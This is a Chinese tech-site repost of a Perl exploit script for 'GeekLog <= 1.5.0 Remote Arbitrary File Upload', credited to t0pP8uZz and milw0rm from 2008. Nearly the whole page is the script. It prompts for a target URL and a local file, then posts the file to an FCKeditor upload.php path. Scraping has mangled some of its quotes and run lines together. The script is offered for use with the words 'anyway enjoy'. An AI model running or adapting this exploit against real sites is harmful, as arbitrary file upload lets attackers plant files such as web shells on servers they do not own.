首页 > 系统服务 > 详细

GeekLog

时间:2016-02-07 07:39:38      阅读:123      评论:0      收藏:0      [点我收藏+]
#!/usr/bin/perl use warnings;
use strict;
use LWP::UserAgent;
use HTTP::Request::Common; print <<INTRO;

GeekLog <= 1.5.0 Remote Arbitrary File Upload

Discovered && Coded By: t0pP8uZz

0day?!?Most sites need custom configuration files
for this exploit to actually work, anyway enjoy

Discovered On: 20 August 2008 / milw0rm.com

Script Download: http://www.geeklog.net
INTRO print "Enter URL(ie: http://site.com): ";
chomp(my $url=<STDIN>);

print "Enter File Path(path to local file to upload): ";
chomp(my $file=<STDIN>); my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.‘/fckeditor/editor/filemanager/upload/php/upload.php‘,
Content_Type => ‘form-data‘,
Content => [ NewFile => $file ] ); if($re->is_success) {
if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
else { print "File Upload Is Disabled! Failed!\n"; }
} else { print "HTTP Request Failed!\n"; } exit;

GeekLog

原文:http://www.jb51.net/hack/5610.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!